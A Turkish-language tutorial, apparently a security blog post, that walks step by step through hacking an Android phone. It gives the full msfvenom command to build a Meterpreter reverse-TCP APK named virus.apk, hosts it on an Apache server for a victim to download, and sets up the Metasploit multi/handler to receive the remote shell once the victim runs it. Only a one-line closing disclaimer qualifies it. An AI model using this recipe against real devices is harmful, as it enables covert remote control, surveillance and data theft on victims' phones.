Herkese merhaba ben YAnıl Sec . Bugün sizlere Android cihazlar için bir hack yöntemi göstereceğim . Hazırsanız başlayalım.
Burada yapacağımız işlemler sırasıyla;
Virüslü dosyayı oluşturmak
Dosyayı /var/www/html içerisine atmak
Apache ile http sunucumuzu kendi ağımızda açmak
Dosyayı indirip , çalıştırmak ve hack işlemini gerçekleştirmekNOT:Sanal makine üzerinden yapıyorsak makinemiz körpü bağdaştırıcısı modunda olmalıdır.
İlk önce msfvenom adlı araç ile virüslü dosyamızı oluşturuyoruz
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORT > /home/virus.apk
Burada -p ile payload belirtiyoruz ve hedef sistemin bize geri bağlanması için reverse_tcp kullanıyoruz . LHOST kısmına kendi ip adresimizi ve LPORT kısmına , gelen bağlantının hangi porttan geleceğini yazıyoruz.
cp virus.apk /var/www/html
Virüs dosyamızı /var/www/html içerisine yolluyoruz ve “service apache 2 start” komutunu terminalimizde çalıştırıyoruz.
Ip adresimizi arama çubuğuna yazdığınızda web sitenize bağlantı sağlayabileceksiniz . Dosyayı bulmak için “http:ipadres/virus.apk” klasörüne gidip dosyayı indiriyoruz . Şimdi dinleme kısmına geçelim . Terminale msfconsole yazıyoruz ve aşağıdaki işlemleri uyguluyoruz.
Gelen istekleri yakalamak için exploit/multi/handler ı kullanıyoruz ve payload olarak başta yazdığımız şekilde android/meterpreter/reverse_tcp ayarlıyoruz.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Gerekli ayarlamaları yapmak için show options yazıyoruz.
set LHOST <IP>
set LPORT <PORT>
LHOST kısmına kendi ip adresimizi , Virüsü oluştururken hangi portu seçtiysek LPORT kısmına o portu yazıyoruz.
Ayarlamaları yaptıktan sonra exploit yazıyoruz ve kurbanın virüsü çalıştırmasını bekliyoruz . Çalıştırdıktan sonra meterpreter ile bağlanmış olacağız.
Bütün sorumluluk sizde , bu bilgileri kötüye kullanmamalısınız aksi takdirde hukuki işlemler ile sıkıntı yaşayabilirsiniz . Okuduğunuz için teşekkürler.
